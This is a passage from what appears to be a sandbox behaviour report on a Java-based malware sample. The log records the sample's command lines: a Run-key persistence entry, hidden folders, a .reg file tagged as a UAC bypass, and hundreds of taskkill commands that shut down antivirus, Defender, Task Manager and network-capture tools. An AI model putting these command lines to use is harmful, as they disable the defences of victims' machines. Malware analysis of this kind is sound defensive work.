    taskkill /IM FortiClient_Diagnostic_Tool.exe /T /F
    3⤵
    - Kills process with taskkill
    PID:1964
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM av_task.exe /T /F
    3⤵
    PID:3684
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM CertReg.exe /T /F
    3⤵
    PID:4076
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM FilMsg.exe /T /F
    3⤵
    PID:6912
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM FilUp.exe /T /F
    3⤵
    PID:2888
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM filwscc.exe /T /F
    3⤵
    PID:6400
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM filwscc.exe /T /F
    3⤵
    PID:3444
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM psview.exe /T /F
    3⤵
    PID:1036
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM quamgr.exe /T /F
    3⤵
    PID:4184
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM quamgr.exe /T /F
    3⤵
    PID:6164
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM schmgr.exe /T /F
    3⤵
    PID:6352
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM schmgr.exe /T /F
    3⤵
    PID:1764
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM twsscan.exe /T /F
    3⤵
    PID:1524
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM twssrv.exe /T /F
    3⤵
    - Kills process with taskkill
    PID:5560
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM UserReg.exe /T /F
    3⤵
    - Kills process with taskkill
    PID:5284

C:\Users\Admin\AppData\Local\Temp\server.exe
"C:\Users\Admin\AppData\Local\Temp\server.exe"
1⤵
- Executes dropped EXE
PID:4568

C:\Program Files\Java\jre-1.8\bin\javaw.exe
"C:\Program Files\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\Admin\AppData\Local\Temp\udroi.jar"
1⤵
- Drops file in System32 directory
PID:7144
- C:\Program Files\Java\jre-1.8\bin\java.exe
  "C:\Program Files\Java\jre-1.8\bin\java.exe" -jar C:\Users\Admin\AppData\Local\Temp\_0.154565338909011038891098980457091777.class
  2⤵
  - Drops file in System32 directory
  PID:5348
- - C:\Windows\SYSTEM32\cmd.exe
    cmd.exe /C cscript.exe C:\Users\Admin\AppData\Local\Temp\Retrive5390157969700392755.vbs
    3⤵
    PID:3172
  - - C:\Windows\system32\cscript.exe
      cscript.exe C:\Users\Admin\AppData\Local\Temp\Retrive5390157969700392755.vbs
      4⤵
      PID:5856
- - C:\Windows\SYSTEM32\cmd.exe
    cmd.exe /C cscript.exe C:\Users\Admin\AppData\Local\Temp\Retrive4811998699324635802.vbs
    3⤵
    PID:864
  - - C:\Windows\system32\cscript.exe
      cscript.exe C:\Users\Admin\AppData\Local\Temp\Retrive4811998699324635802.vbs
      4⤵
      PID:4176
- - C:\Windows\SYSTEM32\cmd.exe
    cmd.exe
    3⤵
    PID:1988
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe /C cscript.exe C:\Users\Admin\AppData\Local\Temp\Retrive9003127150550041564.vbs
  2⤵
  PID:1948
- - C:\Windows\system32\cscript.exe
    cscript.exe C:\Users\Admin\AppData\Local\Temp\Retrive9003127150550041564.vbs
    3⤵
    PID:7036
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe /C cscript.exe C:\Users\Admin\AppData\Local\Temp\Retrive4697284829989034295.vbs
  2⤵
  PID:1492
- - C:\Windows\system32\cscript.exe
    cscript.exe C:\Users\Admin\AppData\Local\Temp\Retrive4697284829989034295.vbs
    3⤵
    PID:7100
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3240
- C:\Windows\SYSTEM32\reg.exe
  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v sVCHXnbVdLZ /t REG_EXPAND_SZ /d "\"C:\Users\Admin\AppData\Roaming\Oracle\bin\javaw.exe\" -jar \"C:\Users\Admin\JbWWIoBadTZ\lHhuTzdHfZG.ZDwmik\"" /f
  2⤵
  - Adds Run key to start application
  - Modifies registry key
  PID:4184
- C:\Windows\SYSTEM32\attrib.exe
  attrib +h "C:\Users\Admin\JbWWIoBadTZ\*.*"
  2⤵
  - Views/modifies file attributes
  PID:3192
- C:\Windows\SYSTEM32\attrib.exe
  attrib +h "C:\Users\Admin\JbWWIoBadTZ"
  2⤵
  - Views/modifies file attributes
  PID:2100
- C:\Users\Admin\AppData\Roaming\Oracle\bin\javaw.exe
  C:\Users\Admin\AppData\Roaming\Oracle\bin\javaw.exe -jar C:\Users\Admin\JbWWIoBadTZ\lHhuTzdHfZG.ZDwmik
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Drops file in System32 directory
  PID:3340
- - C:\Users\Admin\AppData\Roaming\Oracle\bin\java.exe
    C:\Users\Admin\AppData\Roaming\Oracle\bin\java.exe -jar C:\Users\Admin\AppData\Local\Temp\_0.442741919572968168154790715577884598.class
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Drops file in System32 directory
    PID:6616
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /C cscript.exe C:\Users\Admin\AppData\Local\Temp\Retrive601257241879852966.vbs
      4⤵
      PID:5984
    - - C:\Windows\system32\cscript.exe
        
        cscript.exe C:\Users\Admin\AppData\Local\Temp\Retrive601257241879852966.vbs
        5⤵
        
        PID:624
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /C cscript.exe C:\Users\Admin\AppData\Local\Temp\Retrive8085619266784931221.vbs
      4⤵
      PID:7076
    - - C:\Windows\system32\cscript.exe
        
        cscript.exe C:\Users\Admin\AppData\Local\Temp\Retrive8085619266784931221.vbs
        5⤵
        
        PID:6924
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe
      4⤵
      PID:3468
- - C:\Windows\SYSTEM32\cmd.exe
    cmd.exe /C cscript.exe C:\Users\Admin\AppData\Local\Temp\Retrive6999195172490864510.vbs
    3⤵
    PID:6672
  - - C:\Windows\system32\cscript.exe
      cscript.exe C:\Users\Admin\AppData\Local\Temp\Retrive6999195172490864510.vbs
      4⤵
      PID:5176
- - C:\Windows\SYSTEM32\cmd.exe
    cmd.exe /C cscript.exe C:\Users\Admin\AppData\Local\Temp\Retrive5967019696507941721.vbs
    3⤵
    PID:4724
  - - C:\Windows\system32\cscript.exe
      cscript.exe C:\Users\Admin\AppData\Local\Temp\Retrive5967019696507941721.vbs
      4⤵
      PID:6004
- - C:\Windows\SYSTEM32\cmd.exe
    cmd.exe
    3⤵
    PID:7000
- - C:\Windows\SYSTEM32\cmd.exe
    cmd.exe /c regedit.exe /s C:\Users\Admin\AppData\Local\Temp\WHAbDWueHH10071306042193275.reg
    3⤵
    PID:1284
  - - C:\Windows\regedit.exe
      regedit.exe /s C:\Users\Admin\AppData\Local\Temp\WHAbDWueHH10071306042193275.reg
      4⤵
      UAC bypass
      Event Triggered Execution: Image File Execution Options Injection
      Runs .reg file with regedit
      PID:4232
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM UserAccountControlSettings.exe /T /F
    3⤵
    PID:5728
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM Taskmgr.exe /T /F
    3⤵
    - Kills process with taskkill
    PID:6484
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM ProcessHacker.exe /T /F
    3⤵
    PID:6336
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM procexp.exe /T /F
    3⤵
    PID:7132
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM MSASCui.exe /T /F
    3⤵
    PID:1952
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM MsMpEng.exe /T /F
    3⤵
    - Kills process with taskkill
    PID:6612
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM MpUXSrv.exe /T /F
    3⤵
    PID:7152
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM MpCmdRun.exe /T /F
    3⤵
    PID:6552
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM NisSrv.exe /T /F
    3⤵
    PID:1840
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM ConfigSecurityPolicy.exe /T /F
    3⤵
    - Kills process with taskkill
    PID:6340
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM procexp.exe /T /F
    3⤵
    PID:4432
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM wireshark.exe /T /F
    3⤵
    PID:6800
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM tshark.exe /T /F
    3⤵
    PID:6720
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM text2pcap.exe /T /F
    3⤵
    PID:4888
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM rawshark.exe /T /F
    3⤵
    PID:7132
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM mergecap.exe /T /F
    3⤵
    PID:1088
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM editcap.exe /T /F
    3⤵
    PID:3848
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM dumpcap.exe /T /F
    3⤵
    PID:6812
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM capinfos.exe /T /F
    3⤵
    PID:2960
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM mbam.exe /T /F
    3⤵
    PID:2332
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM mbamscheduler.exe /T /F
    3⤵
    PID:5024
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM mbamservice.exe /T /F
    3⤵
    PID:3976
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM AdAwareService.exe /T /F
    3⤵
    PID:6996
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM AdAwareTray.exe /T /F
    3⤵
    PID:3176
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM WebCompanion.exe /T /F
    3⤵
    PID:1608
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM AdAwareDesktop.exe /T /F
    3⤵
    - Kills process with taskkill
    PID:1768
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM V3Main.exe /T /F
    3⤵
    - Kills process with taskkill
    PID:5056
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM V3Svc.exe /T /F
    3⤵
    PID:5148
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM V3Up.exe /T /F
    3⤵
    - Kills process with taskkill
    PID:7128
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM V3SP.exe /T /F
    3⤵
    PID:4980
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM V3Proxy.exe /T /F
    3⤵
    PID:1276
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM V3Medic.exe /T /F
    3⤵
    PID:6340
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM BgScan.exe /T /F
    3⤵
    PID:3240
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM BullGuard.exe /T /F
    3⤵
    PID:6684
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM BullGuardBhvScanner.exe /T /F
    3⤵
    - Kills process with taskkill
    PID:1052
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM BullGuarScanner.exe /T /F
    3⤵
    PID:5408
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM LittleHook.exe /T /F
    3⤵
    PID:6620
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM BullGuardUpdate.exe /T /F
    3⤵
    PID:6380
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM clamscan.exe /T /F
    3⤵
    PID:2324
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM ClamTray.exe /T /F
    3⤵
    PID:1524
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM ClamWin.exe /T /F
    3⤵
    PID:2960
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM cis.exe /T /F
    3⤵
    PID:6924
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM CisTray.exe /T /F
    3⤵
    - Kills process with taskkill
    PID:1788
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM cmdagent.exe /T /F
    3⤵
    PID:6340
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM cavwp.exe /T /F
    3⤵
    PID:5308
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM dragon_updater.exe /T /F
    3⤵
    PID:7140
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM MWAGENT.EXE /T /F
    3⤵
    - Kills process with taskkill
    PID:6412
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM MWASER.EXE /T /F
    3⤵
    PID:4004
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM CONSCTLX.EXE /T /F
    3⤵
    PID:6640
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM avpmapp.exe /T /F
    3⤵
    PID:6488
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM econceal.exe /T /F
    3⤵
    PID:3104
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM escanmon.exe /T /F
    3⤵
    PID:5152
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM escanpro.exe /T /F
    3⤵
    PID:6896
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM TRAYSSER.EXE /T /F
    3⤵
    PID:4432
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM TRAYICOS.EXE /T /F
    3⤵
    PID:1492
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM econser.exe /T /F
    3⤵
    PID:864
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM VIEWTCP.EXE /T /F
    3⤵
    PID:6720
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM FSHDLL64.exe /T /F
    3⤵
    PID:5388
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM fsgk32.exe /T /F
    3⤵
    PID:1560
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM fshoster32.exe /T /F
    3⤵
    PID:5052
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM FSMA32.EXE /T /F
    3⤵
    PID:5340
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM fsorsp.exe /T /F
    3⤵
    PID:3088
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM fssm32.exe /T /F
    3⤵
    PID:1324
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM FSM32.EXE /T /F
    3⤵
    PID:4568
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM trigger.exe /T /F
    3⤵
    PID:1784
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM FProtTray.exe /T /F
    3⤵
    PID:5760
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM FPWin.exe /T /F
    3⤵
    PID:4416
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM FPAVServer.exe /T /F
    3⤵
    PID:7040
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM AVK.exe /T /F
    3⤵
    PID:6160
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM GdBgInx64.exe /T /F
    3⤵
    PID:2764
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM AVKProxy.exe /T /F
    3⤵
    PID:4884
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM GDScan.exe /T /F
    3⤵
    PID:5408
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM AVKWCtlx64.exe /T /F
    3⤵
    PID:6640
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM AVKService.exe /T /F
    3⤵
    - Kills process with taskkill
    PID:5852
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM AVKTray.exe /T /F
    3⤵
    PID:6324
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM GDKBFltExe32.exe /T /F
    3⤵
    PID:6596
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM GDSC.exe /T /F
    3⤵
    PID:1328
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM virusutilities.exe /T /F
    3⤵
    PID:4800
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM guardxservice.exe /T /F
    3⤵
    PID:6924
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM guardxkickoff_x64.exe /T /F
    3⤵
    - Kills process with taskkill
    PID:6500
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM iptray.exe /T /F
    3⤵
    PID:3928
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM freshclam.exe /T /F
    3⤵
    PID:1748
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM freshclamwrap.exe /T /F
    3⤵
    PID:5248
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM K7RTScan.exe /T /F
    3⤵
    PID:3588
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM K7FWSrvc.exe /T /F
    3⤵
    PID:6708
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM K7PSSrvc.exe /T /F
    3⤵
    PID:6380
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM K7EmlPxy.EXE /T /F
    3⤵
    PID:6464
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM K7TSecurity.exe /T /F
    3⤵
    PID:5796
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM K7AVScan.exe /T /F
    3⤵
    PID:6484
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM K7CrvSvc.exe /T /F
    3⤵
    PID:3176
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM K7SysMon.Exe /T /F
    3⤵
    PID:4928
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM K7TSMain.exe /T /F
    3⤵
    PID:5664
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM K7TSMngr.exe /T /F
    3⤵
    PID:6564
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM nanosvc.exe /T /F
    3⤵
    PID:1036
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM nanoav.exe /T /F
    3⤵
    PID:6156
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM nnf.exe /T /F
    3⤵
    PID:4288
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM nvcsvc.exe /T /F
    3⤵
    - Kills process with taskkill
    PID:4576
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM nbrowser.exe /T /F
    3⤵
    PID:3920
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM nseupdatesvc.exe /T /F
    3⤵
    PID:1476
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM nfservice.exe /T /F
    3⤵
    PID:436
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM nwscmon.exe /T /F
    3⤵
    PID:6336
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM njeeves2.exe /T /F
    3⤵
    PID:3228
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM nvcod.exe /T /F
    3⤵
    PID:3756
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM nvoy.exe /T /F
    3⤵
    PID:6460
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM zlhh.exe /T /F
    3⤵
    PID:2324
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM Zlh.exe /T /F
    3⤵
    PID:1764
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM nprosec.exe /T /F
    3⤵
    PID:4976
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM Zanda.exe /T /F
    3⤵
    PID:4400
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM NS.exe /T /F
    3⤵
    PID:3752
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM acs.exe /T /F
    3⤵
    PID:1920
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM op_mon.exe /T /F
    3⤵
    PID:5408
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM PSANHost.exe /T /F
    3⤵
    PID:5056
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM PSUAMain.exe /T /F
    3⤵
    PID:1376
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM PSUAService.exe /T /F
    3⤵
    PID:5664
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM AgentSvc.exe /T /F
    3⤵
    PID:5440
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM BDSSVC.EXE /T /F
    3⤵
    PID:5932
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM EMLPROXY.EXE /T /F
    3⤵
    PID:6228
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM OPSSVC.EXE /T /F
    3⤵
    PID:1772
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM ONLINENT.EXE /T /F
    3⤵
    PID:4360
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM QUHLPSVC.EXE /T /F
    3⤵
    PID:3648
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM SAPISSVC.EXE /T /F
    3⤵
    PID:2184
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM SCANNER.EXE /T /F
    3⤵
    PID:5300
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM SCANWSCS.EXE /T /F
    3⤵
    PID:5280
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM scproxysrv.exe /T /F
    3⤵
    PID:5552
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM ScSecSvc.exe /T /F
    3⤵
    PID:1560
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM SUPERAntiSpyware.exe /T /F
    3⤵
    PID:6136
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM SASCore64.exe /T /F
    3⤵
    PID:4416
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM SSUpdate64.exe /T /F
    3⤵
    PID:4680
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM SUPERDelete.exe /T /F
    3⤵
    PID:1324
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM SASTask.exe /T /F
    3⤵
    PID:3172
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM K7RTScan.exe /T /F
    3⤵
    PID:4204
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM K7FWSrvc.exe /T /F
    3⤵
    PID:5988
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM K7PSSrvc.exe /T /F
    3⤵
    PID:5432
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM K7EmlPxy.EXE /T /F
    3⤵
    PID:2160
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM K7TSecurity.exe /T /F
    3⤵
    PID:3048
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM K7AVScan.exe /T /F
    3⤵
    PID:5684
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM K7CrvSvc.exe /T /F
    3⤵
    PID:5244
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM K7SysMon.Exe /T /F
    3⤵
    PID:6532
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM K7TSMain.exe /T /F
    3⤵
    PID:332
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM K7TSMngr.exe /T /F
    3⤵
    PID:1776
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM uiWinMgr.exe /T /F
    3⤵
    PID:6140
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM uiWatchDog.exe /T /F
    3⤵
    PID:3520
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM uiSeAgnt.exe /T /F
    3⤵
    PID:6052
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM PtWatchDog.exe /T /F
    3⤵
    PID:6740
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM PtSvcHost.exe /T /F
    3⤵
    PID:3976
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM PtSessionAgent.exe /T /F
    3⤵
    PID:4576
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM coreFrameworkHost.exe /T /F
    3⤵
    PID:1784
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM coreServiceShell.exe /T /F
    3⤵
    PID:4860
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM uiUpdateTray.exe /T /F
    3⤵
    PID:7076
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM VIPREUI.exe /T /F
    3⤵
    PID:6564
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM SBAMSvc.exe /T /F
    3⤵
    PID:3336
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM SBAMTray.exe /T /F
    3⤵
    PID:2044
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM SBPIMSvc.exe /T /F
    3⤵
    PID:1992
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM bavhm.exe /T /F
    3⤵
    PID:2512
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM BavSvc.exe /T /F
    3⤵
    PID:6392
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM BavTray.exe /T /F
    3⤵
    PID:5768
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM Bav.exe /T /F
    3⤵
    PID:1712
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM BavWebClient.exe /T /F
    3⤵
    PID:6912
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM BavUpdater.exe /T /F
    3⤵
    PID:5092
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM MCShieldCCC.exe /T /F
    3⤵
    PID:6888
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM MCShieldRTM.exe /T /F
    3⤵
    PID:1948
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM MCShieldDS.exe /T /F
    3⤵
    PID:4488
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM MCS-Uninstall.exe /T /F
    3⤵
    PID:1172
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM SDScan.exe /T /F
    3⤵
    PID:2044
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM SDFSSvc.exe /T /F
    3⤵
    PID:5828
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM SDWelcome.exe /T /F
    3⤵
    PID:6052
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM SDTray.exe /T /F
    3⤵
    PID:2996
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM UnThreat.exe /T /F
    3⤵
    PID:6648
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM utsvc.exe /T /F
    3⤵
    PID:5936
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM FortiClient.exe /T /F
    3⤵
    PID:5024
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM fcappdb.exe /T /F
    3⤵
    PID:1176
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM FCDBlog.exe /T /F
    3⤵
    PID:6724
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM FCHelper64.exe /T /F
    3⤵
    - Kills process with taskkill
    PID:964
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM fmon.exe /T /F
    3⤵
    PID:4724
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM FortiESNAC.exe /T /F
    3⤵
    PID:6240
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM FortiProxy.exe /T /F
    3⤵
    PID:3048
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM FortiSSLVPNdaemon.exe /T /F
    3⤵
    PID:1892
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM FortiTray.exe /T /F
    3⤵
    PID:5864
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM FortiFW.exe /T /F
    3⤵
    - Kills process with taskkill
    PID:5124
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM FortiClient_Diagnostic_Tool.exe /T /F
    3⤵
    PID:4360
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM av_task.exe /T /F
    3⤵
    PID:620
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM CertReg.exe /T /F
    3⤵
    PID:5988
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM FilMsg.exe /T /F
    3⤵
    PID:4964
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM FilUp.exe /T /F
    3⤵
    PID:2632
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM filwscc.exe /T /F
    3⤵
    PID:5468
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM filwscc.exe /T /F
    3⤵
    PID:3800
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM psview.exe /T /F
    3⤵
    PID:5444
- - C:\Windows\SYSTEM32\taskkill.exe
